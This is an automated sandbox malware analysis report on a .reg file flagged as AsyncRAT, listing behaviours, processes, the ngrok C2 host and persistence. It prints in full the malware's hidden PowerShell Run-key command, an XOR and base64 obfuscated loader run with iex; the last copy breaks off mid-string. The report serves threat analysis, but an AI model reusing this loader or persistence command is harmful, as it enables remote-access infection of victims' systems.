Malware Analysis Report

2025-06-16 00:48

Sample ID 241107-1smw7s1rhm
Target YjJqp0O3NZzC.reg
SHA256 cf6c2c3495096544c6957276ee7dfea94f4a6efbe9b94d36df73cd6bf14da39c
Tags
asyncrat default defense_evasion discovery execution persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cf6c2c3495096544c6957276ee7dfea94f4a6efbe9b94d36df73cd6bf14da39c

Threat Level: Known bad

The file YjJqp0O3NZzC.reg was found to be: Known bad.

Malicious Activity Summary

asyncrat default defense_evasion discovery execution persistence rat

AsyncRat

Asyncrat family

Async RAT payload

System Binary Proxy Execution: Regsvcs/Regasm

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

System Location Discovery: System Language Discovery

Suspicious use of WriteProcessMemory

Runs .reg file with regedit

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Runs regedit.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-07 21:54

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-07 21:54

Reported

2024-11-07 21:57

Platform

win7-20240903-en

Max time kernel

129s

Max time network

127s

Command Line

regedit.exe "C:\Users\Admin\AppData\Local\Temp\YjJqp0O3NZzC.reg"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

System Binary Proxy Execution: Regsvcs/Regasm

defense_evasion
Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Temp\RegAsm.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\RegAsm.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RegAsm.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBQAFQAMQByAE8AegA4ADcATwBXAGsALwBhAEQANAA2AE4ARABWAHIATwAyAHMANwBPAHoAOAAwAGEARAA0ADQAUABqAFYAcABQAHoAdAByAGEARAA4AHEATABYAEEAMgBaAEcAaAAxAEwAUwBWAGsAZQBuADgAdABJAEYAaAAvAFoAQwAxAGwAZQBYAGwAOQBmAGoAYwBpAEkAbQBoAGcAZgBYAGwAMABJADIATgBxAGYAMgBKAG0ASQAyAFIAaQBJAG4ANQA1AGUARwA4AGoAZQBYAFYANQBMAFMAQgBZAGYAbQBoAFAAYgBIADUAawBiAGwAMQBzAGYAMwA1AGsAWQAyAG8AdABJAEUAVgBvAGIARwBsAG8AZgAzADQAdABLAFcAVgBvAGIARwBsAG8AZgAzADQAawBOAGkAMABwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFQAMgB4ACsAYQBEAHMANQBMAFQAQQB0AEoAVQBwAG8AZQBTAEIARQBlAFcAaABnAFgAWAA5AGkAZgBXAGgALwBlAFgAUQB0AEkARgAxAHMAZQBXAFUAdABLAGsAVgBHAFQAbABnADMAVQBWADUAaQBhADMAbAA2AGIASAA5AG8AVQBVAE0AaQBUAEMAbwB0AEkARQBOAHMAWQBHAGcAdABLAG0AaABqAGIAbgA5ADAAZgBYAGsAcQBKAEMATgBvAFkAMgA1AC8AZABIADEANQBOAGkAMABwAFoAbQBoADAATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4ATwBZAG0ATgA3AGEASAA5ADUAVQBEAGMAMwBTADMAOQBpAFkARQA5AHMAZgBtAGcANwBPAFYANQA1AGYAMgBSAGoAYQBpAFUAcQBZAFUASQAwAFIAbQA1AGUAWQBXADgAMABlAFcAbABwAE8AawBoADUAVwBrAFYAZgBkAEQAdAArAGUAagBBAHcASwBpAFEAMgBMAFMAbABrAGUAMQBKAHMAWQAyAGwAUwBhAFcAeAA1AGIAQwAwAHcATABWAFoAZQBkAEgANQA1AGEARwBBAGoAVABtAEoAagBlADIAaAAvAGUAVgBBADMATgAwAHQALwBZAG0AQgBQAGIASAA1AG8ATwB6AGwAZQBlAFgAOQBrAFkAMgBvAGwASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBVADkAcwBmAG0AZwA3AE8AUwBRADIATABTAGwAawBlAHkAMAB3AEwAUwBsAGsAZQAxAEoAcwBZADIAbABTAGEAVwB4ADUAYgBGAFkAOQBJAHkATQA4AE8ARgBBADIATABTAGwAbwBZADIANQAvAGQASAAxADUAYQBHAGwAUwBhAFcAeAA1AGIAQwAwAHcATABTAGwAawBlADEASgBzAFkAMgBsAFMAYQBXAHgANQBiAEYAWQA4AE8AeQBNAGoASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBWAEEAMgBMAFMAbABzAGEASAA0AHQATQBDADEARABhAEgAbwBnAFEAbQA5AG4AYQBHADUANQBMAFYANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQARwBoACsAUQBHAHgAagBiAEcAcABvAGEAVABZAHQASwBXAHgAbwBmAGkATgBBAFkAbQBsAG8ATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQAbQBSADkAWgBXAGgALwBRAEcASgBwAGEARgBBADMATgAwADUAUABUAGoAWQB0AEsAVwB4AG8AZgBpAE4ARwBhAEgAUQB0AE0AQwAwAHAAWgBtAGgAMABOAGkAMABwAGIARwBoACsASQAwAFIAYgBMAFQAQQB0AEsAVwBSADcATgBpADAAcABhAFcAaAB1AGYAMwBSADkAZQBXAEoALwBMAFQAQQB0AEsAVwB4AG8AZgBpAE4ATwBmADIAaABzAGUAVwBoAEoAYQBHADUALwBkAEgAMQA1AFkAbgA4AGwASgBEAFkAdABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABkAEgAbABvAGYAaQAwAHcATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAagBXAFgAOQBzAFkAMwA1AHIAWQBuADkAZwBTADIAUgBqAGIARwBGAFAAWQBXAEoAdQBaAGkAVQBwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFUAbQBsAHMAZQBXAHcAaABMAFQAMABoAEwAUwBsAG8AWQAyADUALwBkAEgAMQA1AGEARwBsAFMAYQBXAHgANQBiAEMATgBCAGEARwBOAHEAZQBXAFUAawBOAGkAMABwAGEAVwBoAHUAWQBtAGwAbwBhAFUAOQBzAGYAbQBnADcATwBTADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBXAFcAaAAxAGUAUwBOAEkAWQAyADUAaQBhAFcAUgBqAGEAbABBADMATgAxAGgAWgBTAHoAVQBqAFMAbQBoADUAWABuAGwALwBaAEcATgBxAEoAUwBsAHAAYQBHADUAaQBhAFcAaABwAFQAMwBSADUAYQBIADQAawBOAGkAMABwAGIAMwBSADUAYQBIADQAdABNAEMAMQBXAFgAbgBSACsAZQBXAGgAZwBJADAANQBpAFkAMwB0AG8AZgAzAGwAUQBOAHoAZABMAGYAMgBKAGcAVAAyAHgAKwBhAEQAcwA1AFgAbgBsAC8AWgBHAE4AcQBKAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABtAEYAbwBhAEgAMAB0AEkARgA1AG8AYgBtAEoAagBhAFgANAB0AFAAegBZAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMAB3AEwAVgBaAGUAZABIADUANQBhAEcAQQBqAFIARQBJAGoAWABXAHgANQBaAFYAQQAzAE4AMABwAG8AZQBWAGwAbwBZAEgAMQBkAGIASABsAGwASgBTAFEAdABKAGkAMABxAFgAMgBoAHEAVABIADUAZwBJADIAaAAxAGEAQwBvADIATABWAFoAZQBkAEgANQA1AGEARwBBAGoAUgBFAEkAagBTADIAUgBoAGEARgBBADMATgAxAHAALwBaAEgAbABvAFQARwBGAGgAVAAzAFIANQBhAEgANABsAEsAWABsAG8AWQBIADEATABaAEcARgBvAFgAVwB4ADUAWgBTAEUAdABLAFcAOQAwAGUAVwBoACsASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABYADkAaQBiAG0AaAArAGYAaQAwAGcAUwAyAFIAaABhAEYAMQBzAGUAVwBVAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMABnAFcAbQBSAGoAYQBXAEoANgBYAG4AbAAwAFkAVwBnAHQAUgBXAFIAcABhAFcAaABqACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA=" C:\Windows\regedit.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBQAFQAMQByAE8AegA4ADcATwBXAGsALwBhAEQANAA2AE4ARABWAHIATwAyAHMANwBPAHoAOAAwAGEARAA0ADQAUABqAFYAcABQAHoAdAByAGEARAA4AHEATABYAEEAMgBaAEcAaAAxAEwAUwBWAGsAZQBuADgAdABJAEYAaAAvAFoAQwAxAGwAZQBYAGwAOQBmAGoAYwBpAEkAbQBoAGcAZgBYAGwAMABJADIATgBxAGYAMgBKAG0ASQAyAFIAaQBJAG4ANQA1AGUARwA4AGoAZQBYAFYANQBMAFMAQgBZAGYAbQBoAFAAYgBIADUAawBiAGwAMQBzAGYAMwA1AGsAWQAyAG8AdABJAEUAVgBvAGIARwBsAG8AZgAzADQAdABLAFcAVgBvAGIARwBsAG8AZgAzADQAawBOAGkAMABwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFQAMgB4ACsAYQBEAHMANQBMAFQAQQB0AEoAVQBwAG8AZQBTAEIARQBlAFcAaABnAFgAWAA5AGkAZgBXAGgALwBlAFgAUQB0AEkARgAxAHMAZQBXAFUAdABLAGsAVgBHAFQAbABnADMAVQBWADUAaQBhADMAbAA2AGIASAA5AG8AVQBVAE0AaQBUAEMAbwB0AEkARQBOAHMAWQBHAGcAdABLAG0AaABqAGIAbgA5ADAAZgBYAGsAcQBKAEMATgBvAFkAMgA1AC8AZABIADEANQBOAGkAMABwAFoAbQBoADAATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4ATwBZAG0ATgA3AGEASAA5ADUAVQBEAGMAMwBTADMAOQBpAFkARQA5AHMAZgBtAGcANwBPAFYANQA1AGYAMgBSAGoAYQBpAFUAcQBZAFUASQAwAFIAbQA1AGUAWQBXADgAMABlAFcAbABwAE8AawBoADUAVwBrAFYAZgBkAEQAdAArAGUAagBBAHcASwBpAFEAMgBMAFMAbABrAGUAMQBKAHMAWQAyAGwAUwBhAFcAeAA1AGIAQwAwAHcATABWAFoAZQBkAEgANQA1AGEARwBBAGoAVABtAEoAagBlADIAaAAvAGUAVgBBADMATgAwAHQALwBZAG0AQgBQAGIASAA1AG8ATwB6AGwAZQBlAFgAOQBrAFkAMgBvAGwASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBVADkAcwBmAG0AZwA3AE8AUwBRADIATABTAGwAawBlAHkAMAB3AEwAUwBsAGsAZQAxAEoAcwBZADIAbABTAGEAVwB4ADUAYgBGAFkAOQBJAHkATQA4AE8ARgBBADIATABTAGwAbwBZADIANQAvAGQASAAxADUAYQBHAGwAUwBhAFcAeAA1AGIAQwAwAHcATABTAGwAawBlADEASgBzAFkAMgBsAFMAYQBXAHgANQBiAEYAWQA4AE8AeQBNAGoASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBWAEEAMgBMAFMAbABzAGEASAA0AHQATQBDADEARABhAEgAbwBnAFEAbQA5AG4AYQBHADUANQBMAFYANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQARwBoACsAUQBHAHgAagBiAEcAcABvAGEAVABZAHQASwBXAHgAbwBmAGkATgBBAFkAbQBsAG8ATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQAbQBSADkAWgBXAGgALwBRAEcASgBwAGEARgBBADMATgAwADUAUABUAGoAWQB0AEsAVwB4AG8AZgBpAE4ARwBhAEgAUQB0AE0AQwAwAHAAWgBtAGgAMABOAGkAMABwAGIARwBoACsASQAwAFIAYgBMAFQAQQB0AEsAVwBSADcATgBpADAAcABhAFcAaAB1AGYAMwBSADkAZQBXAEoALwBMAFQAQQB0AEsAVwB4AG8AZgBpAE4ATwBmADIAaABzAGUAVwBoAEoAYQBHADUALwBkAEgAMQA1AFkAbgA4AGwASgBEAFkAdABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABkAEgAbABvAGYAaQAwAHcATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAagBXAFgAOQBzAFkAMwA1AHIAWQBuADkAZwBTADIAUgBqAGIARwBGAFAAWQBXAEoAdQBaAGkAVQBwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFUAbQBsAHMAZQBXAHcAaABMAFQAMABoAEwAUwBsAG8AWQAyADUALwBkAEgAMQA1AGEARwBsAFMAYQBXAHgANQBiAEMATgBCAGEARwBOAHEAZQBXAFUAawBOAGkAMABwAGEAVwBoAHUAWQBtAGwAbwBhAFUAOQBzAGYAbQBnADcATwBTADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBXAFcAaAAxAGUAUwBOAEkAWQAyADUAaQBhAFcAUgBqAGEAbABBADMATgAxAGgAWgBTAHoAVQBqAFMAbQBoADUAWABuAGwALwBaAEcATgBxAEoAUwBsAHAAYQBHADUAaQBhAFcAaABwAFQAMwBSADUAYQBIADQAawBOAGkAMABwAGIAMwBSADUAYQBIADQAdABNAEMAMQBXAFgAbgBSACsAZQBXAGgAZwBJADAANQBpAFkAMwB0AG8AZgAzAGwAUQBOAHoAZABMAGYAMgBKAGcAVAAyAHgAKwBhAEQAcwA1AFgAbgBsAC8AWgBHAE4AcQBKAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABtAEYAbwBhAEgAMAB0AEkARgA1AG8AYgBtAEoAagBhAFgANAB0AFAAegBZAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMAB3AEwAVgBaAGUAZABIADUANQBhAEcAQQBqAFIARQBJAGoAWABXAHgANQBaAFYAQQAzAE4AMABwAG8AZQBWAGwAbwBZAEgAMQBkAGIASABsAGwASgBTAFEAdABKAGkAMABxAFgAMgBoAHEAVABIADUAZwBJADIAaAAxAGEAQwBvADIATABWAFoAZQBkAEgANQA1AGEARwBBAGoAUgBFAEkAagBTADIAUgBoAGEARgBBADMATgAxAHAALwBaAEgAbABvAFQARwBGAGgAVAAzAFIANQBhAEgANABsAEsAWABsAG8AWQBIADEATABaAEcARgBvAFgAVwB4ADUAWgBTAEUAdABLAFcAOQAwAGUAVwBoACsASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABYADkAaQBiAG0AaAArAGYAaQAwAGcAUwAyAFIAaABhAEYAMQBzAGUAVwBVAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMABnAFcAbQBSAGoAYQBXAEoANgBYAG4AbAAwAFkAVwBnAHQAUgBXAFIAcABhAFcAaABqACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA=" C:\Windows\regedit.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A 4.tcp.eu.ngrok.io N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RegAsm.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A

Runs regedit.exe

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Processes

C:\Windows\regedit.exe

regedit.exe "C:\Users\Admin\AppData\Local\Temp\YjJqp0O3NZzC.reg"

C:\Windows\regedit.exe

"C:\Windows\regedit.exe"

C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe

"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBQAFQAMQByAE8AegA4ADcATwBXAGsALwBhAEQANAA2AE4ARABWAHIATwAyAHMANwBPAHoAOAAwAGEARAA0ADQAUABqAFYAcABQAHoAdAByAGEARAA4AHEATABYAEEAMgBaAEcAaAAxAEwAUwBWAGsAZQBuADgAdABJAEYAaAAvAFoAQwAxAGwAZQBYAGwAOQBmAGoAYwBpAEkAbQBoAGcAZgBYAGwAMABJADIATgBxAGYAMgBKAG0ASQAyAFIAaQBJAG4ANQA1AGUARwA4AGoAZQBYAFYANQBMAFMAQgBZAGYAbQBoAFAAYgBIADUAawBiAGwAMQBzAGYAMwA1AGsAWQAyAG8AdABJAEUAVgBvAGIARwBsAG8AZgAzADQAdABLAFcAVgBvAGIARwBsAG8AZgAzADQAawBOAGkAMABwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFQAMgB4ACsAYQBEAHMANQBMAFQAQQB0AEoAVQBwAG8AZQBTAEIARQBlAFcAaABnAFgAWAA5AGkAZgBXAGgALwBlAFgAUQB0AEkARgAxAHMAZQBXAFUAdABLAGsAVgBHAFQAbABnADMAVQBWADUAaQBhADMAbAA2AGIASAA5AG8AVQBVAE0AaQBUAEMAbwB0AEkARQBOAHMAWQBHAGcAdABLAG0AaABqAGIAbgA5ADAAZgBYAGsAcQBKAEMATgBvAFkAMgA1AC8AZABIADEANQBOAGkAMABwAFoAbQBoADAATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4ATwBZAG0ATgA3AGEASAA5ADUAVQBEAGMAMwBTADMAOQBpAFkARQA5AHMAZgBtAGcANwBPAFYANQA1AGYAMgBSAGoAYQBpAFUAcQBZAFUASQAwAFIAbQA1AGUAWQBXADgAMABlAFcAbABwAE8AawBoADUAVwBrAFYAZgBkAEQAdAArAGUAagBBAHcASwBpAFEAMgBMAFMAbABrAGUAMQBKAHMAWQAyAGwAUwBhAFcAeAA1AGIAQwAwAHcATABWAFoAZQBkAEgANQA1AGEARwBBAGoAVABtAEoAagBlADIAaAAvAGUAVgBBADMATgAwAHQALwBZAG0AQgBQAGIASAA1AG8ATwB6AGwAZQBlAFgAOQBrAFkAMgBvAGwASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBVADkAcwBmAG0AZwA3AE8AUwBRADIATABTAGwAawBlAHkAMAB3AEwAUwBsAGsAZQAxAEoAcwBZADIAbABTAGEAVwB4ADUAYgBGAFkAOQBJAHkATQA4AE8ARgBBADIATABTAGwAbwBZADIANQAvAGQASAAxADUAYQBHAGwAUwBhAFcAeAA1AGIAQwAwAHcATABTAGwAawBlADEASgBzAFkAMgBsAFMAYQBXAHgANQBiAEYAWQA4AE8AeQBNAGoASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBWAEEAMgBMAFMAbABzAGEASAA0AHQATQBDADEARABhAEgAbwBnAFEAbQA5AG4AYQBHADUANQBMAFYANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQARwBoACsAUQBHAHgAagBiAEcAcABvAGEAVABZAHQASwBXAHgAbwBmAGkATgBBAFkAbQBsAG8ATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQAbQBSADkAWgBXAGgALwBRAEcASgBwAGEARgBBADMATgAwADUAUABUAGoAWQB0AEsAVwB4AG8AZgBpAE4ARwBhAEgAUQB0AE0AQwAwAHAAWgBtAGgAMABOAGkAMABwAGIARwBoACsASQAwAFIAYgBMAFQAQQB0AEsAVwBSADcATgBpADAAcABhAFcAaAB1AGYAMwBSADkAZQBXAEoALwBMAFQAQQB0AEsAVwB4AG8AZgBpAE4ATwBmADIAaABzAGUAVwBoAEoAYQBHADUALwBkAEgAMQA1AFkAbgA4AGwASgBEAFkAdABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABkAEgAbABvAGYAaQAwAHcATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAagBXAFgAOQBzAFkAMwA1AHIAWQBuADkAZwBTADIAUgBqAGIARwBGAFAAWQBXAEoAdQBaAGkAVQBwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFUAbQBsAHMAZQBXAHcAaABMAFQAMABoAEwAUwBsAG8AWQAyADUALwBkAEgAMQA1AGEARwBsAFMAYQBXAHgANQBiAEMATgBCAGEARwBOAHEAZQBXAFUAawBOAGkAMABwAGEAVwBoAHUAWQBtAGwAbwBhAFUAOQBzAGYAbQBnADcATwBTADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBXAFcAaAAxAGUAUwBOAEkAWQAyADUAaQBhAFcAUgBqAGEAbABBADMATgAxAGgAWgBTAHoAVQBqAFMAbQBoADUAWABuAGwALwBaAEcATgBxAEoAUwBsAHAAYQBHADUAaQBhAFcAaABwAFQAMwBSADUAYQBIADQAawBOAGkAMABwAGIAMwBSADUAYQBIADQAdABNAEMAMQBXAFgAbgBSACsAZQBXAGgAZwBJADAANQBpAFkAMwB0AG8AZgAzAGwAUQBOAHoAZABMAGYAMgBKAGcAVAAyAHgAKwBhAEQAcwA1AFgAbgBsAC8AWgBHAE4AcQBKAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABtAEYAbwBhAEgAMAB0AEkARgA1AG8AYgBtAEoAagBhAFgANAB0AFAAegBZAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMAB3AEwAVgBaAGUAZABIADUANQBhAEcAQQBqAFIARQBJAGoAWABXAHgANQBaAFYAQQAzAE4AMABwAG8AZQBWAGwAbwBZAEgAMQBkAGIASABsAGwASgBTAFEAdABKAGkAMABxAFgAMgBoAHEAVABIADUAZwBJADIAaAAxAGEAQwBvADIATABWAFoAZQBkAEgANQA1AGEARwBBAGoAUgBFAEkAagBTADIAUgBoAGEARgBBADMATgAxAHAALwBaAEgAbABvAFQARwBGAGgAVAAzAFIANQBhAEgANABsAEsAWABsAG8AWQBIADEATABaAEcARgBvAFgAVwB4ADUAWgBTAEUAdABLAFcAOQAwAGUAVwBoACsASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABYADkAaQBiAG0AaAArAGYAaQAwAGcAUwAyAFIAaABhAEYAMQBzAGUAVwBVAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMABnAFcAbQBSAGoAYQBXAEoANgBYAG4AbAAwAFkAVwBnAHQAUgBXAFIAcABhAFcAaABqACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAA